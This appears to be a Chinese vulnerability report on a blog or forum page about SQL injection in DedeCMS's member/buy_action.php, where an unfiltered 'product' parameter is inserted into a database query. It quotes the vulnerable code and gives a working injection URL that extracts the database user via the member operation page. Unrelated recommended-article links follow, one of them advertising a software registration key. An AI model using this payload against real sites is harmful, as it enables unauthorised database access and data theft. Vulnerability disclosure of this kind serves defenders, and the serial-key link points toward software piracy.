详细说明:member/buy_action.php require_once(dirname(__FILE__).”/config.php”); CheckRank(0,0); $menutype = ‘mydede’; $menutype_son = ‘op’; require_once DEDEINC.’/dedetemplate.class.php’; $product = isset($product) ? trim($product) : ”; $mid = $cfg_ml->M_ID; $ptype = ”; $pname = ”; $price = ”; $mtime = time(); 省略XX行 if(empty($product)) { ShowMsg(“请选择一个产品!”, ‘javascript:;’); exit(); } 省略xxx行 =if(!isset($paytype)) { $inquery = “INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`) VALUES (‘$buyid’, ‘$pname’, ‘$product’ , ‘$price’ , ‘$mtime’ , ‘$pid’ , ‘$mid’ , ‘0’ , ‘$ptype’);//product没有过滤 “; echo $inquery.”<br>” ;漏洞证明:测试方法 注册用户之后验证邮箱完了之后 打开 127.0.0.1/dedecms/member/buy_action.php?product=1′,1,2,3,4,5,@`’`),((select user()),(select 1),’4 然后在http://127.0.0.1/dedecms/member/operation.php 就可以查看到返回信息了
相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
